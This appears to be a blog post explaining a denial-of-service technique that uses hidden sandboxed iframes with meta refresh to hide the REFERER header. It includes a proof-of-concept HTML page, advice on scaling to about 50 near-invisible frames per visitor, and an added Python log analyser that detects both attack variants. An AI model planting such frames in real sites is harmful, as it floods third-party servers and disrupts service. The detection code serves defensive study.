It is interesting how few people came up with the same concept, but nevertheless we will publish it.

HTML5 offers great opportunities for developers: it allows you to create dynamic web pages, WYSIWYG support and other interesting solutions that one could once only dream of.

How can you use HTML to perform a DDoS attack?

The basic way is for a malicious site to include an IMG tag whose SRC attribute points to an image hosted on the victim's side.
The downside of this approach is that the REFERER header is left in the request. The attacked party then has logs indicating where the attack came from.

Another, slightly more interesting solution is to use the IFRAME tag with the SANDBOX attribute (with execution of JS scripts allowed).
At present, most browsers drop the REFERER header when the classic HTML refresh is used.

The following code is a PoC for this attack type:

<!DOCTYPE HTML>
<html>
<head>
<title>DoS via HTML5 – Kruczek Robert ::</title>
</head>
<body>
<iframe src="about:blank" sandbox="allow-scripts" id="noheader" style="width: 99%; height: 99%; position: absolute;"></iframe>
<script type="text/javascript">
// Build a document that meta-refreshes to url and load it into the sandboxed frame via srcdoc.
function noheader(url) {
  var src = ('<html><head><meta http-equiv="refresh" content="1; url=' + url + '"></head><body>w8</body></html>');
  document.getElementById('noheader').srcdoc = src;
}
noheader('');
</script>
</body>
</html>

It is logical that a single request will not do much, but consider that our iframe can be styled using CSS, for example opacity: 0.1; then the frame will be almost imperceptible. We can further generate frames automatically in a loop, where 50 frames per user is easily enough; each visitor then performs 50 full views of the victim's page, along with the execution of all server-side scripts on the targeted subpage.
The attack gains momentum with the size of the infected site: 1,000 people online times 50 frames?
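From the attacked party's side, both variants can be looked for in the access log. The following is an added example, not code from the original post: it flags an external REFERER that dominates the traffic (the IMG variant) and clients that send a burst of REFERER-less requests for one page (the sandboxed IFRAME variant). The log format (Combined Log Format), the thresholds, the host names and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Combined Log Format: ip - - [time] "METHOD path proto" status bytes "referer" "agent"
LINE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+) [^"]*" \d{3} \S+ "([^"]*)" "[^"]*"')

def parse(lines):
    """Return (ip, time, path, referer) tuples for every well-formed log line."""
    rows = []
    for line in lines:
        m = LINE.match(line)
        if m:
            ip, ts, path, ref = m.groups()
            rows.append((ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), path, ref))
    return rows

def referer_sources(lines, own_host, min_share=0.5):
    """IMG variant: external Referer values carried by >= min_share of all requests."""
    rows = parse(lines)
    refs = Counter(ref for _, _, _, ref in rows if ref not in ("", "-") and own_host not in ref)
    return [ref for ref, n in refs.items() if n / len(rows) >= min_share]

def burst_clients(lines, threshold=50, window=timedelta(seconds=10)):
    """Sandboxed-iframe variant: (ip, path) pairs with >= threshold referer-less hits inside window."""
    stamps = defaultdict(list)
    for ip, ts, path, ref in parse(lines):
        if ref in ("", "-"):
            stamps[(ip, path)].append(ts)
    flagged = set()
    for key, times in stamps.items():
        times.sort()
        # Slide over the sorted timestamps: any run of `threshold` hits within `window` is a burst.
        if any(times[i + threshold - 1] - times[i] <= window
               for i in range(len(times) - threshold + 1)):
            flagged.add(key)
    return flagged

def _line(ip, sec, path, ref):
    return (f'{ip} - - [01/Jan/2020:12:00:{sec:02d} +0000] '
            f'"GET {path} HTTP/1.1" 200 512 "{ref}" "Mozilla/5.0"')

# Constructed sample log (documentation addresses and example hosts, not real traffic).
SAMPLE = (
    [_line("198.51.100.7", i % 5, "/report.php", "-") for i in range(50)]
    + [_line(f"203.0.113.{i}", i, "/logo.png", "http://infected.example/page") for i in range(60)]
    + [_line("192.0.2.4", 30, "/", "-")]
)

if __name__ == "__main__":
    print("referer sources:", referer_sources(SAMPLE, "victim.example"))
    print("burst clients:", burst_clients(SAMPLE))
```

A missing REFERER on its own is normal (direct visits, bookmarks), so the burst check keys on repetition of the same page by the same client; the threshold of 50 mirrors the frame count mentioned above and should be tuned to real traffic.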
